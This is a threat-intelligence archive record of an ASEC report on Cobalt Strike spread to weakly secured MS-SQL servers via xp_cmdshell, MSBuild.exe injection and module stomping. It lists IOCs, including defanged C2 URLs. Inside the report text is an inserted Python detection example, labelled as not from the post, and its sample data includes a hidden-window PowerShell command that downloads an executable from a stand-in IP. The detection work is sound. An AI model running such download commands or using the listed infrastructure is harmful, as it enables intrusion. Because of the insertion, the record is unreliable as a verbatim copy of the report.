{
	"id": "f1fb3ec9-b365-4834-b0fb-ff07512c2f11",
	"created_at": "2026-04-06T00:11:47.817365Z",
	"updated_at": "2026-04-10T03:24:23.917362Z",
	"deleted_at": null,
	"sha1_hash": "0185e56b0a0bbac28ae51efc875421cc39c4d86c",
	"title": "Cobalt Strike Being Distributed to Unsecured MS-SQL Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1852301,
	"plain_text": "Cobalt Strike Being Distributed to Unsecured MS-SQL Servers -\r\nASEC\r\nBy ATCP\r\nPublished: 2022-02-10 · Archived: 2026-04-02 11:44:25 UTC\r\nThe ASEC analysis team has recently discovered the distribution of Cobalt Strike targeting unsecured MS-SQL\r\nservers.\r\nMS-SQL server is a typical database server of the Windows environment, and it has consistently been a target of\r\nattack from the past. Attacks that target MS-SQL servers include attacks to the environment where its vulnerability\r\nhas not been patched, brute forcing, and dictionary attack against poorly managed servers.\r\nThe attacker or the malware usually scans port 1433 to check for MS-SQL servers open to the public. It then\r\nperforms brute forcing or dictionary attacks against the admin account, a.k.a. “sa” account to attempt logging in.\r\nEven if the MS-SQL server is not open to the public, there are types such as Lemon Duck malware that scans port\r\n1433 and spreads for the purpose of lateral movement in the internal network.\r\nhttps://asec.ahnlab.com/en/31811/\r\nPage 1 of 4\n\nManaging admin account credentials so that they’re vulnerable to brute forcing and dictionary attacks as above or\r\nfailing to change the credentials periodically may make the MS-SQL server the main target of attackers. Other\r\nmalware besides Lemon Duck that target MS-SQL server includes CoinMiner malware such as Kingminer and\r\nVollgar.\r\nIf the attacker succeeds to log in to the admin account through these processes, they use various methods\r\nincluding the xp_cmdshell command to execute the command in the infected system. Cobalt Strike that has\r\nrecently been discovered was downloaded through cmd.exe and powershell.exe via the MS-SQL process as shown\r\nbelow.\r\nCobalt Strike is a commercial penetration testing tool, and it is recently being used as a medium to dominate the\r\ninternal system in the majority of attacks including APT and ransomware. 
Malware that has recently been discovered is an injector that decodes the Cobalt Strike payload encoded inside it, then launches the legitimate program MSBuild.exe and injects the payload into it.\r\nThe Cobalt Strike beacon executed inside MSBuild.exe uses an additional configuration option to evade security products: it loads the legitimate DLL wwanmm.dll, then writes the beacon into that DLL's memory region and executes it there (the technique known as module stomping). Because the beacon that receives the attacker's commands and performs the malicious behavior does not reside in a suspicious memory area, such as an unbacked private executable allocation, but inside the legitimate module wwanmm.dll, it can evade memory-based detection that looks only for unbacked executable memory. It can still be caught by comparing the module's code section in memory with the copy on disk.\r\nAlthough it is not certain how the attacker took control of the MS-SQL server and installed the malware, detection logs for the Vollgar malware mentioned above were found on the same system, so it can be assumed that the account credentials of the targeted system were poorly managed.\r\nAhnLab's ASD infrastructure shows numerous Cobalt Strike logs over the past month. Since the download URLs and the C\u0026C server URL are similar, most of the attacks appear to be by the same attacker. 
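As an added example (not code from the ASEC post or from AhnLab), the Python below shows detection logic for the two stages described above: the MS-SQL process spawning cmd.exe or powershell.exe to download a payload through xp_cmdshell, and MSBuild.exe being started from that chain and loading wwanmm.dll, plus a module stomping check that compares a loaded DLL's code section in memory with the section on disk. The event layout (Sysmon-style process-creation and image-load records), the paths, PIDs, the 198.51.100.7 address and the command lines are constructed for the example; the rule names and the assumption that wwanmm.dll has no legitimate reason to be loaded into MSBuild.exe are mine, not statements from the report.

```python
import hashlib
import ntpath

# Added example, not code from the ASEC post; paths, PIDs, command lines and
# rule names below are constructed assumptions for the demonstration.
SQL_IMAGE = 'sqlservr.exe'
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}
DOWNLOAD_MARKERS = ('http://', 'https://', 'downloadfile', 'downloadstring',
                    'invoke-webrequest', 'iwr ', 'certutil', 'bitsadmin')
STOMP_HOSTS = {'msbuild.exe'}
UNEXPECTED_IN_HOST = {'wwanmm.dll'}  # assumption: no legitimate reason to sit in MSBuild.exe


def base(path):
    '''Lower-cased file name of a Windows path (ntpath splits on backslashes on any OS).'''
    return ntpath.basename(path).lower()


def ancestry(procs, pid):
    '''Image names of pid and its parents, nearest first; stops at unknown PIDs or cycles.'''
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(base(procs[pid]['image']))
        pid = procs[pid]['ppid']
    return chain


def analyze(events):
    '''Apply the process-chain and image-load rules to Sysmon-like event dicts.'''
    procs = {e['pid']: e for e in events if e['kind'] == 'process'}
    alerts = []
    for e in events:
        if e['kind'] == 'process':
            name = base(e['image'])
            parents = ancestry(procs, e['ppid'])
            if name in SHELLS and SQL_IMAGE in parents:
                # xp_cmdshell makes sqlservr.exe the parent (or grandparent) of the shell.
                cl = e['cmdline'].lower()
                hits = [m for m in DOWNLOAD_MARKERS if m in cl]
                alerts.append({'rule': 'mssql_spawned_shell', 'pid': e['pid'],
                               'severity': 'high' if hits else 'medium',
                               'chain': [name] + parents, 'indicators': hits})
            elif name in STOMP_HOSTS and SQL_IMAGE in parents:
                # MSBuild.exe as a descendant of the database engine: the injector's host.
                alerts.append({'rule': 'msbuild_under_mssql', 'pid': e['pid'],
                               'severity': 'high', 'chain': [name] + parents})
        elif e['kind'] == 'image_load':
            host = base(procs[e['pid']]['image']) if e['pid'] in procs else ''
            if host in STOMP_HOSTS and base(e['image']) in UNEXPECTED_IN_HOST:
                alerts.append({'rule': 'unexpected_dll_in_msbuild', 'pid': e['pid'],
                               'severity': 'high', 'module': base(e['image'])})
    return alerts


def stomped_sections(snapshots):
    '''Module stomping check: a module whose .text bytes in memory differ from the
    section on disk has been overwritten. Relocations are ignored here; a real
    scanner re-applies them before comparing. snapshots: (pid, module, disk, mem).'''
    findings = []
    for pid, module, disk_text, mem_text in snapshots:
        if hashlib.sha256(disk_text).digest() == hashlib.sha256(mem_text).digest():
            continue
        limit = min(len(disk_text), len(mem_text))
        first = next((i for i in range(limit) if disk_text[i] != mem_text[i]), limit)
        # Some loaders leave the injected DLL's own MZ header in place; Cobalt Strike
        # profiles can strip it, so a missing header proves nothing.
        findings.append({'pid': pid, 'module': module, 'first_diff_offset': first,
                         'memory_starts_with_mz': mem_text[:2] == b'MZ'})
    return findings


SAMPLE_EVENTS = [  # constructed telemetry for the chain described in the post
    {'kind': 'process', 'pid': 1200, 'ppid': 600, 'cmdline': 'sqlservr.exe -sMSSQLSERVER',
     'image': 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe'},
    {'kind': 'process', 'pid': 3100, 'ppid': 1200, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'cmd.exe /c powershell -nop -w hidden -c iwr http://198.51.100.7/Acrobat.exe -OutFile C:\\Users\\Public\\a.exe'},
    {'kind': 'process', 'pid': 3120, 'ppid': 3100,
     'image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'cmdline': 'powershell -nop -w hidden -c iwr http://198.51.100.7/Acrobat.exe -OutFile C:\\Users\\Public\\a.exe'},
    {'kind': 'process', 'pid': 3300, 'ppid': 3120, 'image': 'C:\\Users\\Public\\a.exe', 'cmdline': 'a.exe'},
    {'kind': 'process', 'pid': 3310, 'ppid': 3300, 'cmdline': 'MSBuild.exe',
     'image': 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe'},
    {'kind': 'image_load', 'pid': 3310, 'image': 'C:\\Windows\\System32\\wwanmm.dll'},
    {'kind': 'process', 'pid': 4000, 'ppid': 900, 'image': 'C:\\Windows\\explorer.exe', 'cmdline': 'explorer.exe'},
    {'kind': 'process', 'pid': 4100, 'ppid': 4000, 'image': 'C:\\Windows\\System32\\cmd.exe', 'cmdline': 'cmd.exe'},
]


def sample_snapshots():
    '''Constructed .text images: a clean copy and one whose start was overwritten.'''
    clean = bytes(range(256)) * 4
    stomped = b'MZ' + clean[2:]
    return [(3310, 'wwanmm.dll', clean, stomped), (3310, 'kernel32.dll', clean, clean)]
```

analyze(SAMPLE_EVENTS) returns four alerts in event order (cmd.exe under sqlservr.exe, powershell.exe under that cmd.exe, MSBuild.exe as a descendant of sqlservr.exe, and wwanmm.dll loaded into that MSBuild.exe), while the cmd.exe launched from explorer.exe produces nothing; stomped_sections(sample_snapshots()) flags only the module whose code section changed. The process-chain rules depend on the parent link being intact, so a payload persisted through a service or scheduled task created via xp_cmdshell needs its own rule, and MSBuild.exe is legitimate on build servers, so the allow-list should be tuned per environment.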
The IOCs of Cobalt Strike collected over the month are listed below.\r\nAhnLab products are equipped with process-memory-based and behavior-based detection that can counter the beacon backdoor Cobalt Strike uses from the initial intrusion stage through internal spread.\r\n[File Detection]\r\n– Trojan/Win.FDFM.C4959286 (2022.02.09.00)\r\n– Trojan/Win.Injector.C4952559 (2022.02.04.02)\r\n– Trojan/Win.AgentTesla.C4950264 (2022.02.04.00)\r\n– Infostealer/Win.AgentTesla.R470158 (2022.02.03.02)\r\n– Trojan/Win.Generic.C4946561 (2022.02.01.01)\r\n– Trojan/Win.Agent.C4897376 (2022.01.05.02)\r\n– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)\r\n[Behavior Detection]\r\n– Malware/MDP.Download.M1197\r\nMD5\r\nae7026b787b21d06cc1660e4c1e9e423\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//103[.]243[.]26[.]225/Acrobat[.]exe\r\nhttp[:]//92[.]255[.]95[.]90[:]81/owa\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/31811/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/31811/"
	],
	"report_names": [
		"31811"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434307,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.pdf",
		"text": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.txt",
		"img": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.jpg"
	}
}